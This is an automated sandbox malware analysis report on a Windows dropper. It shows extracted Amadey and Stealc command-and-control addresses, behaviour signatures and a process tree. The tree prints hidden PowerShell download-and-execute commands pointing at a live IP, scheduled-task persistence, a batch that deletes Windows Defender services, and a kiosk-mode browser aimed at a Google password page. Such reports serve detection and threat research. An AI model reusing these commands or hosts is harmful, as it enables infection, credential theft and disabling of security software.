Analysis

  • max time kernel
    149s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    24/03/2025, 09:01

General

  • Target

    86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe

  • Size

    938KB

  • MD5

    278fa6cdc2189c33b3cf59614d6d9e7f

  • SHA1

    f382716bf5dc31ee6cdac0a1f9890a5164d0c18e

  • SHA256

    86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a

  • SHA512

    76cdd7a6b9e45ae8413f60e0369d045bfd1bfc3e879e0fac54c1303d312813380dc8907aeaf5e6525b47aa9c3768bac99c58fd1f7a2a38f5f193b5d55ebbf9c6

  • SSDEEP

    24576:eqDEvCTbMWu7rQYlBQcBiT6rprG8a0uu:eTvC/MTQYxsWR7a0u

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 1 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 15 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 27 IoCs
  • Identifies Wine through registry keys 2 TTPs 8 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 59 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Drops file in Program Files directory 46 IoCs
  • Drops file in Windows directory 8 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 54 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 42 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 23 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1200
      • C:\Users\Admin\AppData\Local\Temp\86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe
        "C:\Users\Admin\AppData\Local\Temp\86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:2568
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks /create /tn 7etKomaiMKA /tr "mshta C:\Users\Admin\AppData\Local\Temp\9BABvKunJ.hta" /sc minute /mo 25 /ru "Admin" /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2468
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn 7etKomaiMKA /tr "mshta C:\Users\Admin\AppData\Local\Temp\9BABvKunJ.hta" /sc minute /mo 25 /ru "Admin" /f
            4⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:2888
        • C:\Windows\SysWOW64\mshta.exe
          mshta C:\Users\Admin\AppData\Local\Temp\9BABvKunJ.hta
          3⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:2528
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEVPQVNGORICJML5CO5PJXDWHCZW72LC.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2848
            • C:\Users\Admin\AppData\Local\TempYEVPQVNGORICJML5CO5PJXDWHCZW72LC.EXE
              "C:\Users\Admin\AppData\Local\TempYEVPQVNGORICJML5CO5PJXDWHCZW72LC.EXE"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Loads dropped DLL
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:2712
              • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Downloads MZ/PE file
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Loads dropped DLL
                • Adds Run key to start application
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:320
                • C:\Users\Admin\AppData\Local\Temp\10313630101\cUpXaxB.exe
                  "C:\Users\Admin\AppData\Local\Temp\10313630101\cUpXaxB.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  PID:540
                • C:\Users\Admin\AppData\Local\Temp\10314650101\apple.exe
                  "C:\Users\Admin\AppData\Local\Temp\10314650101\apple.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:2664
                  • C:\Users\Admin\AppData\Local\Temp\11.exe
                    "C:\Users\Admin\AppData\Local\Temp\11.exe"
                    8⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:2244
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CBC7.tmp\CBC8.tmp\CBC9.bat C:\Users\Admin\AppData\Local\Temp\11.exe"
                      9⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2588
                      • C:\Users\Admin\AppData\Local\Temp\11.exe
                        "C:\Users\Admin\AppData\Local\Temp\11.exe" go
                        10⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                        • Suspicious use of WriteProcessMemory
                        PID:1868
                        • C:\Windows\system32\cmd.exe
                          "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CC15.tmp\CC16.tmp\CC17.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"
                          11⤵
                          • Drops file in Program Files directory
                          • Suspicious use of WriteProcessMemory
                          PID:976
                          • C:\Windows\system32\sc.exe
                            sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                            12⤵
                            • Launches sc.exe
                            PID:1452
                          • C:\Windows\system32\sc.exe
                            sc start ddrver
                            12⤵
                            • Launches sc.exe
                            PID:2072
                          • C:\Windows\system32\timeout.exe
                            timeout /t 1
                            12⤵
                            • Delays execution with timeout.exe
                            PID:1644
                          • C:\Windows\system32\sc.exe
                            sc stop ddrver
                            12⤵
                            • Launches sc.exe
                            PID:1488
                          • C:\Windows\system32\sc.exe
                            sc start ddrver
                            12⤵
                            • Launches sc.exe
                            PID:1724
                          • C:\Windows\system32\takeown.exe
                            takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                            12⤵
                            • Possible privilege escalation attempt
                            • Modifies file permissions
                            PID:1268
                          • C:\Windows\system32\icacls.exe
                            icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                            12⤵
                            • Possible privilege escalation attempt
                            • Modifies file permissions
                            PID:1588
                          • C:\Windows\system32\sc.exe
                            sc stop "WinDefend"
                            12⤵
                            • Launches sc.exe
                            PID:1604
                          • C:\Windows\system32\sc.exe
                            sc delete "WinDefend"
                            12⤵
                            • Launches sc.exe
                            PID:1600
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                            12⤵
                              PID:924
                            • C:\Windows\system32\sc.exe
                              sc stop "MDCoreSvc"
                              12⤵
                              • Launches sc.exe
                              PID:972
                            • C:\Windows\system32\sc.exe
                              sc delete "MDCoreSvc"
                              12⤵
                              • Launches sc.exe
                              PID:896
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                              12⤵
                                PID:1028
                              • C:\Windows\system32\sc.exe
                                sc stop "WdNisSvc"
                                12⤵
                                • Launches sc.exe
                                PID:2020
                              • C:\Windows\system32\sc.exe
                                sc delete "WdNisSvc"
                                12⤵
                                • Launches sc.exe
                                PID:2116
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                                12⤵
                                  PID:2424
                                • C:\Windows\system32\sc.exe
                                  sc stop "Sense"
                                  12⤵
                                  • Launches sc.exe
                                  PID:3060
                                • C:\Windows\system32\sc.exe
                                  sc delete "Sense"
                                  12⤵
                                  • Launches sc.exe
                                  PID:1884
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                                  12⤵
                                    PID:2076
                                  • C:\Windows\system32\sc.exe
                                    sc stop "wscsvc"
                                    12⤵
                                    • Launches sc.exe
                                    PID:1716
                                  • C:\Windows\system32\sc.exe
                                    sc delete "wscsvc"
                                    12⤵
                                    • Launches sc.exe
                                    PID:2628
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                    12⤵
                                      PID:2428
                                    • C:\Windows\system32\sc.exe
                                      sc stop "SgrmBroker"
                                      12⤵
                                      • Launches sc.exe
                                      PID:324
                                    • C:\Windows\system32\sc.exe
                                      sc delete "SgrmBroker"
                                      12⤵
                                      • Launches sc.exe
                                      PID:1952
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                      12⤵
                                        PID:988
                                      • C:\Windows\system32\sc.exe
                                        sc stop "SecurityHealthService"
                                        12⤵
                                        • Launches sc.exe
                                        PID:2364
                                      • C:\Windows\system32\sc.exe
                                        sc delete "SecurityHealthService"
                                        12⤵
                                        • Launches sc.exe
                                        PID:2592
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                        12⤵
                                          PID:1764
                                        • C:\Windows\system32\sc.exe
                                          sc stop "webthreatdefsvc"
                                          12⤵
                                          • Launches sc.exe
                                          PID:1756
                                        • C:\Windows\system32\sc.exe
                                          sc delete "webthreatdefsvc"
                                          12⤵
                                          • Launches sc.exe
                                          PID:912
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                          12⤵
                                            PID:2216
                                          • C:\Windows\system32\sc.exe
                                            sc stop "webthreatdefusersvc"
                                            12⤵
                                            • Launches sc.exe
                                            PID:1696
                                          • C:\Windows\system32\sc.exe
                                            sc delete "webthreatdefusersvc"
                                            12⤵
                                            • Launches sc.exe
                                            PID:1624
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                            12⤵
                                              PID:1524
                                            • C:\Windows\system32\sc.exe
                                              sc stop "WdNisDrv"
                                              12⤵
                                              • Launches sc.exe
                                              PID:1552
                                            • C:\Windows\system32\sc.exe
                                              sc delete "WdNisDrv"
                                              12⤵
                                              • Launches sc.exe
                                              PID:1660
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                              12⤵
                                                PID:2108
                                              • C:\Windows\system32\sc.exe
                                                sc stop "WdBoot"
                                                12⤵
                                                • Launches sc.exe
                                                PID:2568
                                              • C:\Windows\system32\sc.exe
                                                sc delete "WdBoot"
                                                12⤵
                                                • Launches sc.exe
                                                PID:2936
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                                12⤵
                                                  PID:2800
                                                • C:\Windows\system32\sc.exe
                                                  sc stop "WdFilter"
                                                  12⤵
                                                  • Launches sc.exe
                                                  PID:2964
                                                • C:\Windows\system32\sc.exe
                                                  sc delete "WdFilter"
                                                  12⤵
                                                  • Launches sc.exe
                                                  PID:2812
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                                  12⤵
                                                    PID:2912
                                                  • C:\Windows\system32\sc.exe
                                                    sc stop "SgrmAgent"
                                                    12⤵
                                                    • Launches sc.exe
                                                    PID:3064
                                                  • C:\Windows\system32\sc.exe
                                                    sc delete "SgrmAgent"
                                                    12⤵
                                                    • Launches sc.exe
                                                    PID:2896
                                                  • C:\Windows\system32\reg.exe
                                                    reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                                    12⤵
                                                      PID:2836
                                                    • C:\Windows\system32\sc.exe
                                                      sc stop "MsSecWfp"
                                                      12⤵
                                                      • Launches sc.exe
                                                      PID:2468
                                                    • C:\Windows\system32\sc.exe
                                                      sc delete "MsSecWfp"
                                                      12⤵
                                                      • Launches sc.exe
                                                      PID:2984
                                                    • C:\Windows\system32\reg.exe
                                                      reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                      12⤵
                                                        PID:2724
                                                      • C:\Windows\system32\sc.exe
                                                        sc stop "MsSecFlt"
                                                        12⤵
                                                        • Launches sc.exe
                                                        PID:2708
                                                      • C:\Windows\system32\sc.exe
                                                        sc delete "MsSecFlt"
                                                        12⤵
                                                        • Launches sc.exe
                                                        PID:2688
                                                      • C:\Windows\system32\reg.exe
                                                        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                        12⤵
                                                          PID:3040
                                                        • C:\Windows\system32\sc.exe
                                                          sc stop "MsSecCore"
                                                          12⤵
                                                          • Launches sc.exe
                                                          PID:2268
                                                        • C:\Windows\system32\sc.exe
                                                          sc delete "MsSecCore"
                                                          12⤵
                                                          • Launches sc.exe
                                                          PID:2828
                                                        • C:\Windows\system32\reg.exe
                                                          reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                          12⤵
                                                            PID:2772
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                            12⤵
                                                              PID:2864
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                              12⤵
                                                                PID:2192
                                                              • C:\Windows\system32\schtasks.exe
                                                                schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                                12⤵
                                                                  PID:2236
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                                  12⤵
                                                                    PID:2848
                                                                  • C:\Windows\system32\sc.exe
                                                                    sc stop ddrver
                                                                    12⤵
                                                                    • Launches sc.exe
                                                                    PID:2388
                                                                  • C:\Windows\system32\sc.exe
                                                                    sc delete ddrver
                                                                    12⤵
                                                                    • Launches sc.exe
                                                                    PID:2160
                                                        • C:\Users\Admin\AppData\Local\Temp\10317340101\Jq0hGDZ.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10317340101\Jq0hGDZ.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:2712
                                                        • C:\Users\Admin\AppData\Local\Temp\10318740101\32a030fbd9.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10318740101\32a030fbd9.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious use of FindShellTrayWindow
                                                          • Suspicious use of SendNotifyMessage
                                                          PID:2440
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c schtasks /create /tn 1wyiymawuEj /tr "mshta C:\Users\Admin\AppData\Local\Temp\fo1ipiSC0.hta" /sc minute /mo 25 /ru "Admin" /f
                                                            8⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:1576
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              schtasks /create /tn 1wyiymawuEj /tr "mshta C:\Users\Admin\AppData\Local\Temp\fo1ipiSC0.hta" /sc minute /mo 25 /ru "Admin" /f
                                                              9⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:1928
                                                          • C:\Windows\SysWOW64\mshta.exe
                                                            mshta C:\Users\Admin\AppData\Local\Temp\fo1ipiSC0.hta
                                                            8⤵
                                                            • System Location Discovery: System Language Discovery
                                                            • Modifies Internet Explorer settings
                                                            PID:1912
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'XQEYYAECNHFBOUUM2CFKXY39DBWQP7SR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                              9⤵
                                                              • Blocklisted process makes network request
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Downloads MZ/PE file
                                                              • Loads dropped DLL
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1428
                                                              • C:\Users\Admin\AppData\Local\TempXQEYYAECNHFBOUUM2CFKXY39DBWQP7SR.EXE
                                                                "C:\Users\Admin\AppData\Local\TempXQEYYAECNHFBOUUM2CFKXY39DBWQP7SR.EXE"
                                                                10⤵
                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                • Checks BIOS information in registry
                                                                • Executes dropped EXE
                                                                • Identifies Wine through registry keys
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:2272
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\10318750121\am_no.cmd" "
                                                          7⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:1496
                                                          • C:\Windows\SysWOW64\timeout.exe
                                                            timeout /t 2
                                                            8⤵
                                                            • System Location Discovery: System Language Discovery
                                                            • Delays execution with timeout.exe
                                                            PID:1644
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                            8⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2252
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                              9⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2116
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                            8⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2428
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                              9⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1988
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                            8⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:1756
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                              9⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2472
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /create /tn "vTCc9magjy6" /tr "mshta \"C:\Temp\oHx9BTVOj.hta\"" /sc minute /mo 25 /ru "Admin" /f
                                                            8⤵
                                                            • System Location Discovery: System Language Discovery
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:1660
                                                          • C:\Windows\SysWOW64\mshta.exe
                                                            mshta "C:\Temp\oHx9BTVOj.hta"
                                                            8⤵
                                                            • System Location Discovery: System Language Discovery
                                                            • Modifies Internet Explorer settings
                                                            PID:2824
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                              9⤵
                                                              • Blocklisted process makes network request
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Downloads MZ/PE file
                                                              • Loads dropped DLL
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2948
                                                              • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                                10⤵
                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                • Checks BIOS information in registry
                                                                • Executes dropped EXE
                                                                • Identifies Wine through registry keys
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:2828
                                                        • C:\Users\Admin\AppData\Local\Temp\10318860101\QL4t9UZ.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10318860101\QL4t9UZ.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:2088
                                                        • C:\Users\Admin\AppData\Local\Temp\10318980101\laf6w_001.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10318980101\laf6w_001.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • System Location Discovery: System Language Discovery
                                                          PID:1596
                                                        • C:\Users\Admin\AppData\Local\Temp\10318990101\ed25bd08e9.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10318990101\ed25bd08e9.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:2276
                                                          • C:\Windows\system32\WerFault.exe
                                                            C:\Windows\system32\WerFault.exe -u -p 2276 -s 36
                                                            8⤵
                                                            • Loads dropped DLL
                                                            PID:648
                                                        • C:\Users\Admin\AppData\Local\Temp\10319000101\fbee3d7922.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10319000101\fbee3d7922.exe"
                                                          7⤵
                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                          • Checks BIOS information in registry
                                                          • Executes dropped EXE
                                                          • Identifies Wine through registry keys
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:1108
                                                        • C:\Users\Admin\AppData\Local\Temp\10319010101\25398cf7b3.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10319010101\25398cf7b3.exe"
                                                          7⤵
                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                          • Checks BIOS information in registry
                                                          • Executes dropped EXE
                                                          • Identifies Wine through registry keys
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:2364
                                                        • C:\Users\Admin\AppData\Local\Temp\10319020101\503d76e836.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10319020101\503d76e836.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of FindShellTrayWindow
                                                          • Suspicious use of SendNotifyMessage
                                                          PID:2772
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill /F /IM firefox.exe /T
                                                            8⤵
                                                            • System Location Discovery: System Language Discovery
                                                            • Kills process with taskkill
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:3032
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill /F /IM chrome.exe /T
                                                            8⤵
                                                            • System Location Discovery: System Language Discovery
                                                            • Kills process with taskkill
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2804
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill /F /IM msedge.exe /T
                                                            8⤵
                                                            • System Location Discovery: System Language Discovery
                                                            • Kills process with taskkill
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2416
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill /F /IM opera.exe /T
                                                            8⤵
                                                            • System Location Discovery: System Language Discovery
                                                            • Kills process with taskkill
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:728
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill /F /IM brave.exe /T
                                                            8⤵
                                                            • System Location Discovery: System Language Discovery
                                                            • Kills process with taskkill
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:3068
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                            8⤵
                                                              PID:968
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
